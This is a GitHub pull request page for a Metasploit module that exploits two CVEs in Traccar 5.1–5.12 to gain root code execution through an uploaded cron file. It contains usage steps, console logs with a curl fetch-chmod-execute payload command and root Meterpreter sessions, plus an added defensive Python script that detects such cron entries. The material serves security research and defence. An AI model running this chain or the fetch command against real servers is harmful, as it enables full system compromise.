
Traccar 5 RCE (CVE-2024-31214 & CVE-2024-24809) Module #19416

Merged
merged 6 commits into from
Sep 23, 2024

Conversation

h4x-x0r

@h4x-x0r h4x-x0r commented Aug 23, 2024

This is a new module which exploits two vulnerabilities in Traccar v5.1 - v5.12 to obtain remote code execution: A path traversal vulnerability (CVE-2024-24809) and an unrestricted file upload vulnerability (CVE-2024-31214). By default, the application allows self-registration, enabling any user to register an account and exploit the issues. Moreover, the application runs by default with root privileges, potentially resulting in a complete system compromise.
This module, which should work on any Red Hat-based Linux system, exploits these issues by adding a new cronjob file that executes the specified payload.

Verification Steps

  1. Download the application from the vendor.
  2. Deploy it by following the vendor's installation guide.
  3. Start msfconsole
  4. use exploit/linux/http/traccar_rce_upload
  5. set RHOSTS <IP>
  6. set LHOST <IP>
  7. exploit

A new crontab file should have been written to /etc/cron.d/ that executes the specified fetch command to get you a meterpreter session in the context of root.

msf6 exploit(linux/http/traccar_rce_upload) > exploit 

[*] Started reverse TCP handler on 192.168.217.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Registering new user...
[*] Authenticating...
[*] Adding new device...
[*] Uploading crontab file...
[*] Cronjob successfully written - waiting for execution...
[*] Sending stage (3045380 bytes) to 192.168.217.138
[*] Meterpreter session 1 opened (192.168.217.128:4444 -> 192.168.217.138:58196) at 2024-08-25 17:03:02 -0400
[*] Exploit finished, check thy shell.

meterpreter > sysinfo 
Computer     : localhost.localdomain
OS           : Red Hat 9.4 (Linux 5.14.0-427.13.1.el9_4.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

meterpreter > getuid 
Server username: root

Successfully tested on

  • Traccar v5.12 on Rocky Linux 9.4
  • Traccar v5.11 on Rocky Linux 9.4

Notes
At the end, I've added a one-minute sleep command, as otherwise the handler might terminate before the cronjob gets executed and the meterpreter session is established.

    print_status('Cronjob successfully written - waiting for execution...')
    sleep(60)

Not sure if there is a proper MSF way to handle this except for running a handler as a standalone instance?
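A defender-side check for the persistence artefact this module leaves behind, added here as an example and not part of the PR or of the Metasploit module itself: it scans /etc/cron.d entries for the traits visible in the logs above (a random 24-hex-character filename, a curl-then-chmod-then-execute chain, an every-minute root schedule). The exact cron line the module writes is not shown in the PR, so a standard cron.d line with a user field is assumed, and the sample entries are constructed.

```python
"""Flag /etc/cron.d entries that look like a dropped fetch-and-execute cronjob."""
import re
from pathlib import Path

# Random 24-hex-character filename, as seen in the module's "Deleted /etc/cron.d/..." output.
HEX_NAME = re.compile(r"^[0-9a-f]{24}$")
# Download-then-execute chain: curl/wget, then chmod +x, then running a relative path.
FETCH_EXEC = re.compile(r"\b(curl|wget)\b.*\bchmod\s+\+x\b.*\./\S+", re.S)
# Every-minute schedule running as root (cron.d lines carry a user field).
EVERY_MINUTE_ROOT = re.compile(r"^\s*\*\s+\*\s+\*\s+\*\s+\*\s+root\b", re.M)


def analyze_cron_entry(name: str, content: str) -> list[str]:
    """Return the reasons (possibly none) an entry looks like a dropped persistence file."""
    findings = []
    if HEX_NAME.match(name):
        findings.append("random-hex-filename")
    if FETCH_EXEC.search(content):
        findings.append("fetch-and-execute-chain")
    if EVERY_MINUTE_ROOT.search(content):
        findings.append("every-minute-as-root")
    return findings


def scan_cron_dir(cron_d: Path) -> dict[str, list[str]]:
    """Scan a real cron.d directory; only entries with findings are returned."""
    results = {}
    for f in sorted(cron_d.iterdir()):
        if f.is_file():
            hits = analyze_cron_entry(f.name, f.read_text(errors="replace"))
            if hits:
                results[f.name] = hits
    return results


# Constructed samples (not captured from a real host); the cron line format is assumed.
SAMPLE_ENTRIES = {
    "0hourly": "01 * * * * root run-parts /etc/cron.hourly\n",
    "sysstat": "*/10 * * * * root /usr/lib64/sa/sa1 1 1\n",
    "0939e785b3601e16bfb36916": (
        "* * * * * root curl -so ./fzxfIziqe http://198.51.100.10:8080/stage; "
        "chmod +x ./fzxfIziqe; ./fzxfIziqe &\n"
    ),
}


def scan_samples() -> dict[str, list[str]]:
    """Run the same checks over the embedded samples instead of a live directory."""
    results = {}
    for name, content in SAMPLE_ENTRIES.items():
        hits = analyze_cron_entry(name, content)
        if hits:
            results[name] = hits
    return results


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(f"{name}: {', '.join(hits)}")
```

On a live host, `scan_cron_dir(Path("/etc/cron.d"))` applies the same checks; the module deletes its file once the payload has run, so pairing this with file-creation auditing on /etc/cron.d catches the short-lived entry as well.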

CVE-2024-31214 & CVE-2024-24809
@h4x-x0r h4x-x0r marked this pull request as draft August 23, 2024 22:18
PoC & Documentation
@h4x-x0r h4x-x0r changed the title [DRAFT] Traccar 5 RCE (CVE-2024-31214 & CVE-2024-24809) Module Traccar 5 RCE (CVE-2024-31214 & CVE-2024-24809) Module Aug 25, 2024
@h4x-x0r h4x-x0r marked this pull request as ready for review August 25, 2024 21:24
@jheysel-r7 jheysel-r7 self-assigned this Aug 27, 2024
cleanup
@jheysel-r7 jheysel-r7 left a comment

Thanks for the great module @h4x-x0r. I followed the setup and verification steps provided and the module worked great. I left a couple minor suggestions. Let me know if you have any questions!

Testing Traccar v5.12 on Rocky 9.4

msf6 exploit(linux/http/traccar_rce_upload) > run

[*] Command to run on remote host: curl -so ./fzxfIziqe http://172.16.199.1:8080/Hn-8qIL46e0vZdQpIHPToA; chmod +x ./fzxfIziqe; ./fzxfIziqe &
[*] Fetch handler listening on 172.16.199.1:8080
[*] HTTP server started
[*] Adding resource /Hn-8qIL46e0vZdQpIHPToA
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version retrieved: 5.12
[+] The target appears to be vulnerable.
[*] Registering new user...
[*] Authenticating...
[*] JSESSIONID: node0zr2il1bs4k2hjpc2gkowvsf59.node0
[*] Adding new device...
[*] Uploading crontab file...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.16.199.130
[*] Cronjob successfully written - please wait 60 seconds for execution...
[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.130:45060) at 2024-08-28 15:43:13 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat 9.4 (Linux 5.14.0-427.31.1.el9_4.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

@h4x-x0r

h4x-x0r commented Aug 29, 2024

Thanks for the great module @h4x-x0r. I followed the setup and verification steps provided and the module worked great. I left a couple minor suggestions. Let me know if you have any questions!

Thank you for reviewing my PR and providing feedback. I'll work through your comments and update the code accordingly.

cleanup
@jheysel-r7 jheysel-r7 removed their assignment Sep 11, 2024
Code cleanup and better handling of different use cases.
@h4x-x0r

h4x-x0r commented Sep 12, 2024

I've updated the code based on the feedback received.

  1. Case when a new user is registered and the e-mail doesn't exist yet:
msf6 > use exploit/linux/http/traccar_rce_upload 
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/traccar_rce_upload) > set RHOSTS 192.168.217.138
RHOSTS => 192.168.217.138
msf6 exploit(linux/http/traccar_rce_upload) > set LHOST 192.168.217.128
LHOST => 192.168.217.128
msf6 exploit(linux/http/traccar_rce_upload) > exploit 

[*] Started reverse TCP handler on 192.168.217.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Registering new user...
[*] Authenticating...
[*] Adding new device...
[*] Uploading crontab file...
[*] Cronjob successfully written - waiting for execution...
[*] Sending stage (3045380 bytes) to 192.168.217.138
[+] Deleted /etc/cron.d/0939e785b3601e16bfb36916"
[*] Meterpreter session 1 opened (192.168.217.128:4444 -> 192.168.217.138:35904) at 2024-09-12 09:28:44 -0400
  2. Case when the provided e-mail already exists, and the correct password is provided:
msf6 exploit(linux/http/traccar_rce_upload) > exploit 

[*] Started reverse TCP handler on 192.168.217.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Registering new user...
[*] The same E-mail already exists on the system, trying to authenticate with existing password...
[*] Adding new device...
[*] Uploading crontab file...
[*] Cronjob successfully written - waiting for execution...
[*] Sending stage (3045380 bytes) to 192.168.217.138
[*] Sending stage (3045380 bytes) to 192.168.217.138
[+] Deleted /etc/cron.d/7eed2c15b23feca694f0f0d8"
[*] Meterpreter session 3 opened (192.168.217.128:4444 -> 192.168.217.138:51582) at 2024-09-12 09:29:26 -0400
  3. Case when the provided e-mail already exists, but a wrong password is provided:
msf6 exploit(linux/http/traccar_rce_upload) > exploit 

[*] Started reverse TCP handler on 192.168.217.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Registering new user...
[*] The same E-mail already exists on the system, trying to authenticate with existing password...
[*] Provide the correct password for the existing E-Mail address, or provide a new E-Mail address.
[-] Exploit aborted due to failure: unexpected-reply: HTTP/1.1 400 Bad Request
Date: Thu, 12 Sep 2024 13:29:59 GMT
Set-Cookie: JSESSIONID=node08xm8vg6a7bgyi387x4y1rmok449.node0; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/json
access-control-allow-headers: origin, content-type, accept, authorization
access-control-allow-credentials: true
access-control-allow-methods: GET, POST, PUT, DELETE, OPTIONS
access-control-allow-origin: *
Content-Length: 256
Server: Jetty(11.0.19)

Cannot invoke "org.traccar.api.security.LoginResult.getUser()" because the return value of "org.traccar.api.security.LoginService.login(String, String, java.lang.Integer)" is null - NullPointerException (SessionResource:121 < ... < OverrideFilter:49 < ...)
[*] Exploit completed, but no session was created.

@jheysel-r7 jheysel-r7 self-assigned this Sep 23, 2024

@jheysel-r7 jheysel-r7 left a comment

Hey @h4x-x0r, thanks for addressing all those comments. I've retested and everything is working as expected, much appreciated. Landing now.

Edit: Removing unnecessary jsessionid parsing then landing.

Testing

msf6 exploit(linux/http/traccar_rce_upload) > run

[*] Started reverse TCP handler on 192.168.1.67:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Registering new user...
[*] Authenticating...
[*] Adding new device...
[*] Uploading crontab file...
[*] Cronjob successfully written - waiting for execution...
[*] Sending stage (3045380 bytes) to 192.168.1.67
[+] Deleted /etc/cron.d/40576ea71c74fe5cdc3a0e9a"
[*] Meterpreter session 1 opened (192.168.1.67:4444 -> 192.168.1.67:51643) at 2024-09-23 14:51:01 -0700

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat 9.4 (Linux 5.14.0-427.31.1.el9_4.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

@jheysel-r7 jheysel-r7 merged commit 8e2dbbb into rapid7:master Sep 23, 2024
36 checks passed
@jheysel-r7 jheysel-r7 added the rn-modules release notes for new or majorly enhanced modules label Sep 23, 2024
@jheysel-r7

Release Notes

This module exploits two vulnerabilities in Traccar v5.1 - v5.12 to obtain remote code execution: A path traversal vulnerability CVE-2024-24809 and an unrestricted file upload vulnerability CVE-2024-31214.

@h4x-x0r

h4x-x0r commented Sep 23, 2024

@jheysel-r7 Thank you!
